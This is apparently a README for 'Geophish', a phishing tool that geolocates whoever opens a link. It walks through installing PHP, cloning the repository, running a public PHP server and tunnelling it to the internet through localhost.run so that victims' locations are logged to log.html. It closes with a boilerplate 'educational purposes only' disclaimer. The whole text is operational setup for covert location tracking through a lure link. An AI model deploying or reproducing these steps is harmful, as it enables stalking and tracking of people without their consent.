Geolocate any device with a link
- Update and install PHP
sudo apt update
sudo apt upgrade -y
sudo apt install -y php
- Clone repo and set permissions.
git clone https://github.com/thegoodhackertv/Geophish
cd Geophish
chmod o+w log.html
- Start web server with PHP.
php -S 0.0.0.0:80
- Expose your website to the internet. Create a tunnel using localhost.run
ssh -R 80:localhost:80 nokey@localhost.run
You should see a link with this format: https://u83450tuntg.lhr.life
, make sure you use HTTPS.
- Logs will be saved into
log.html
Usage of these scripts for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.